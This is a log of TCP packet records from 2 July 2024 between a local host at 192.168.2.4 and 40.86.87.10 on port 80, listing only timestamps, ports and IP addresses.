Jul 2, 2024 07:31:10.668365002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668370962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668375969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668390036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668400049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668401003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668411970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668422937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668426037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668433905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668436050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668448925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668461084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668468952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668473005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668495893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668500900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668514967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668540001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.669267893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669280052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669291019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669305086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669316053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669318914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.669327021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669337034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669344902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.669348955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669357061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.669358969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669370890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669374943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.669380903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669392109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669403076 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.669403076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669414997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669425964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.669430971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.669442892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.669466972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788042068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788065910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788075924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788146019 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788233995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788252115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788264036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788281918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788285971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788295031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788326979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788355112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788538933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788552046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788593054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788692951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788703918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788722038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788729906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788733006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788744926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788757086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788764954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788768053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788779974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.788794994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.788822889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789222002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789233923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789244890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789257050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789268017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789279938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789283037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789293051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789295912 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789304972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789311886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789316893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789326906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789338112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789355040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789371014 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789674044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789685011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789695024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789705992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789717913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789727926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789731026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789740086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789740086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789751053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789762974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789766073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789774895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789786100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789789915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789799929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.789803982 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789829969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.789855003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790430069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790448904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790461063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790472031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790482998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790494919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790501118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790501118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790517092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790523052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790529966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790539026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790549994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790550947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790564060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790574074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790585995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790595055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790596008 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790597916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790606976 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790610075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790626049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790637016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790638924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.790648937 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.790676117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791390896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791402102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791410923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791445017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791452885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791456938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791467905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791474104 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791480064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791491032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791493893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791501045 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791512012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791517973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791522026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791533947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791539907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791544914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791551113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791557074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791565895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791568995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791579962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791590929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791591883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791604042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791615963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.791618109 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791640997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.791650057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.792447090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.792459965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.792470932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.792494059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.792505980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.792516947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.792520046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.792529106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.792541027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.792546034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.792566061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.792579889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915304899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915416002 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915482998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915493011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915504932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915514946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915525913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915537119 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915611982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915616035 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915625095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915644884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915656090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915667057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915669918 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915693998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915729046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915788889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915800095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915811062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915822029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915832996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915843010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915843964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915854931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.915879965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.915894985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916069984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916080952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916090965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916101933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916112900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916121960 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916135073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916156054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916349888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916362047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916373014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916383982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916402102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916405916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916414022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916434050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916450024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916790962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916802883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916814089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916824102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916835070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916846037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916846037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916857004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916862965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916867018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916879892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916882992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916891098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916898966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916903019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916913986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.916934013 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.916960955 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.917398930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917411089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917421103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917433023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917444944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917454958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917455912 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.917464972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.917465925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917479038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917489052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917500973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917512894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917519093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.917527914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917541027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.917562008 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.917587996 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918078899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918090105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918100119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918112993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918123960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918131113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918134928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918145895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918148994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918157101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918169022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918171883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918179989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918191910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918196917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918203115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918215036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918226004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918226957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918237925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918241978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918248892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918260098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918271065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918277979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918282986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.918308973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.918328047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919101954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919114113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919123888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919135094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919146061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919153929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919158936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919168949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919181108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919183016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919190884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919202089 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919203043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919214010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919225931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919229031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919238091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919250011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919256926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919260025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919272900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919275045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919284105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919301987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919320107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919342995 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919872046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919884920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919895887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.919924021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.919940948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.011676073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.011693001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.011748075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038199902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038213015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038224936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038254976 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038275957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038434029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038444996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038460970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038471937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038479090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038485050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038496971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038501978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038510084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038535118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038549900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.038701057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.038717031 CEST	80	49730	40.86.87.10	192.168.2.4
